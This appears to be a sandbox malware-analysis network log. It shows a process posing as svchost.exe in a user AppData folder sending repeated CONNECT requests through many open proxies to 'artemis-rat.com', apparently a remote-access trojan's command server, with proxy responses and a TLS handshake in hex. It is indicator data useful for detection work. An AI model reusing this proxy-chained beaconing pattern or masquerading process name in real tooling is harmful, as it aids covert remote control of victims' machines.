Mar 9, 2024 13:14:34.645961046 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2247	192.168.2.5	57016	49.228.131.169	5000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.399882078 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2248	192.168.2.5	57114	20.210.113.32	8123	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.422070980 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.682356119 CET	319	IN	HTTP/1.1 403 Forbidden Server: squid Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html;charset=utf-8 Content-Length: 17 X-Squid-Error: ERR_ACCESS_DENIED 0 X-Cache: MISS from cdn-fintech.info X-Cache-Lookup: NONE from cdn-fintech.info:8123 Connection: keep-alive Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2249	192.168.2.5	56079	120.48.62.239	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.422074080 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.747006893 CET	641	IN	HTTP/1.1 503 Service Unavailable Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: Content-Type,AccessToken,X-CSRF-Token, Authorization, Token Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE,UPDATE Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length, Access-Control-Allow-Origin, Access-Control-Allow-Headers, Content-Type Content-Type: text/plain; charset=utf-8 Set-Cookie: uuid=94690398-de0e-11ee-9749-fa20201ff994; Path=/; Max-Age=8640000; HttpOnly X-Content-Type-Options: nosniff Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Length: 31 Data Raw: 75 6e 73 75 70 70 6f 72 74 65 64 20 70 72 6f 74 6f 63 6f 6c 20 73 63 68 65 6d 65 20 22 22 0a Data Ascii: unsupported protocol scheme ""

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2250	192.168.2.5	57036	190.103.177.131	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.425544024 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.807657003 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2251	192.168.2.5	57060	161.97.163.52	45725	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.435076952 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.177042007 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.169274092 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.177330017 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2252	192.168.2.5	56023	45.81.232.17	30717	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.444154978 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.380332947 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.254163027 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2253	192.168.2.5	57189	104.19.233.117	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.460937023 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.615461111 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2254	192.168.2.5	57117	80.169.243.234	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.462289095 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2255	192.168.2.5	56260	162.241.158.204	31794	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.472244978 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.942717075 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.146334887 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2256	192.168.2.5	57133	119.196.168.183	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.478980064 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2257	192.168.2.5	57091	39.108.227.108	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.479685068 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.118031979 CET	39	IN	HTTP/1.1 200 Connection established
Mar 9, 2024 13:14:30.118395090 CET	177	OUT	Data Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 a4 ff c5 b9 88 db 96 b2 0e f6 59 1d 6d 24 1b 78 2f 25 de 93 bf f9 fd 7e f2 f4 8c 83 ef 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: eRYm$x/%~*,+0/$#('=<5/Uartemis-rat.com#
Mar 9, 2024 13:14:30.731970072 CET	324	IN	Data Raw: 9f 57 a9 41 6d 5a 90 a7 db 3a ea 75 80 0c 63 0b 69 74 6f 07 4c 15 f3 37 28 a5 19 a4 6e f5 f6 20 cd 63 b2 7e c4 2b 09 75 89 da d1 3c 2e 72 4f 36 1a a1 9e 44 d0 cd 9b a6 23 08 3f 97 a1 a7 9e 5a a5 f7 09 94 ad 5d 76 5d 28 56 d1 1a 66 51 51 07 7b de Data Ascii: WAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?'>#ZB-z6=`9cxN!>\9+S/tgw7-[peZ%wjNuMjfynm"m,P5}pY*
Mar 9, 2024 13:14:30.732007027 CET	1286	IN	Data Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 ec 52 a6 e1 bd cf 48 a4 1d 40 61 0e 09 0d 7d 4a 93 b1 6f 89 84 60 a1 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00 Data Ascii: C?eRH@a}Jo`DOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
Mar 9, 2024 13:14:30.732029915 CET	1286	IN	Data Raw: 98 6e 71 f4 11 ac 4d b8 a7 7d 6f da c6 bc f4 b1 9e 56 4d 29 6b 80 18 2b 54 cc 2f af 96 ce 21 d1 4a a2 d6 af dc dc c3 23 73 8a f8 60 aa 82 11 8f 73 e6 dd de ff f1 c4 74 75 19 89 f2 11 f3 81 b3 5c 09 1f 05 21 66 f5 dc f5 01 c2 34 dc e1 8e 2b 77 c7 Data Ascii: nqM}oVM)k+T/!J#s`stu\!f4+wF3yO3RDw.QJRh8?hXZR`UHG3XF%~ t\5\|0F<Arp'~00tP'S"0*H0G10UUS
Mar 9, 2024 13:14:30.732049942 CET	412	IN	Data Raw: e3 3d f4 67 6d 3d 7c e5 34 88 e3 32 fa a7 6e 06 6a 6f bd 8b 91 ee 16 4b e8 3b a9 b3 37 e7 c3 44 a4 7e d8 6c d7 c7 46 f5 92 9b e7 d5 21 be 66 92 19 94 55 6c d4 29 b2 0d c1 66 5b e2 77 49 48 28 ed 9d d7 1a 33 72 53 b3 82 35 cf 62 8b c9 24 8b a5 b7 Data Ascii: =gm=\|42njoK;7D~lF!fUl)f[wIH(3rS5b$9~AR?,( wGI{BIv;/&ul.8l3x Jo+**4~2-?s1ryq?#W,dUNqFGh&
Mar 9, 2024 13:14:30.732120037 CET	1286	IN	Data Raw: 05 66 30 82 05 62 30 82 04 4a a0 03 02 01 02 02 10 77 bd 0d 6c db 36 f9 1a ea 21 0f c4 f0 58 d3 0d 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 57 31 0b 30 09 06 03 55 04 06 13 02 42 45 31 19 30 17 06 03 55 04 0a 13 10 47 6c 6f 62 61 6c 53 69 Data Ascii: f0b0Jwl6!X0*H0W10UBE10UGlobalSign nv-sa10URoot CA10UGlobalSign Root CA0200619000042Z280128000042Z0G10UUS1"0 UGoogle Trust Services LLC10UGTS Root R10
Mar 9, 2024 13:14:30.734141111 CET	93	OUT	Data Raw: 16 03 03 00 25 10 00 00 21 20 97 ae c7 0d 64 5e 08 ee 21 0e 6e 06 f7 0b 59 1f a5 f2 00 4a f0 6b 43 c9 32 33 80 33 5f e1 71 67 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 88 f3 62 cd 4e 4b d3 aa 18 0b a4 69 5e ff 1e 4c 31 d1 fd 28 db Data Ascii: %! d^!nYJkC233_qg(bNKi^L1(ZN3@`0{
Mar 9, 2024 13:14:31.362221003 CET	258	IN	Data Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 1f 00 c0 46 14 29 d9 60 85 81 d2 07 eb 42 9e c8 b8 d3 d6 65 03 d4 50 8c fa 06 93 a8 2b a6 f4 9c 5e 37 ab 77 97 0f c5 86 95 be 1c 99 6d c2 d4 91 88 bb f3 10 2d a1 9d b1 c1 4f 1c 9a de e7 d6 25 cf ef 4f 1d bb 4b Data Ascii: F)`BeP+^7wm-O%OKWdW?W NWTqW>p0M,DK}ZBeZ+$Rn3\Ukg6:*?.<(<d-wU@
Mar 9, 2024 13:14:31.363248110 CET	252	OUT	Data Raw: 17 03 03 00 f7 00 00 00 00 00 00 00 01 1f 1d aa 2e 1f b0 3a c7 9d b7 27 ad e9 a8 64 40 df cd ef 2e 82 86 17 d6 ce da aa 3f 0b 8e 6f 9b fb 11 8f c4 95 6f 6a 88 0d 83 5d 8b 4d a1 2a 40 cc 9a ca d1 96 6a 45 00 46 76 e8 2b 8a 3e 88 06 51 a7 9e 39 86 Data Ascii: .:'d@.?ooj]M*@jEFv+>Q9bPX{bF"uN Ux\y,`.5B8LTbnLCT)uw24-R6A}J2DX[-Gv;9ou[oS1C7Kh\ukfsw"9VR
Mar 9, 2024 13:14:31.981673002 CET	112	IN	Data Raw: c8 42 1d 8a 87 ca c8 4d 1d 62 6a ca ee f2 c5 a3 a6 d4 24 9d cc bb 28 2b fb e9 d0 ce b4 42 ab 49 78 cd 8e a1 b1 63 c9 d2 54 af 95 7d 3a 67 09 22 ed 0a 05 e1 42 4d b1 09 6d fc b1 3e f4 3b dd d4 3e 1a 1c d7 ec 6f 79 a2 58 6e ee af c7 07 e4 1e 0d 1f Data Ascii: BMbj$(+BIxcT}:g"BMm>;>oyXneV\|x#fbYnQ>m

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2258	192.168.2.5	55727	64.227.108.25	31908	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.479882002 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2259	192.168.2.5	57188	162.144.36.208	27829	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.490017891 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.063947916 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.624469042 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.880616903 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2260	192.168.2.5	57081	45.117.179.179	35942	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.491724014 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2261	192.168.2.5	57138	20.206.106.192	8123	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.494014978 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.816756010 CET	319	IN	HTTP/1.1 403 Forbidden Server: squid Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html;charset=utf-8 Content-Length: 17 X-Squid-Error: ERR_ACCESS_DENIED 0 X-Cache: MISS from cdn-fintech.info X-Cache-Lookup: NONE from cdn-fintech.info:8123 Connection: keep-alive Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2262	192.168.2.5	57126	62.85.224.217	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.508174896 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2263	192.168.2.5	57245	172.67.209.12	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.509248018 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.668093920 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2264	192.168.2.5	57158	202.131.65.110	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.512913942 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.177103043 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.168977976 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.068090916 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.880582094 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2265	192.168.2.5	56306	45.61.188.134	44499	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.516833067 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2266	192.168.2.5	57144	148.72.212.212	33905	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.517055988 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.333626032 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.334148884 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.334100962 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.333694935 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2267	192.168.2.5	57108	212.174.242.114	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.521821022 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.380353928 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.568166971 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.787712097 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
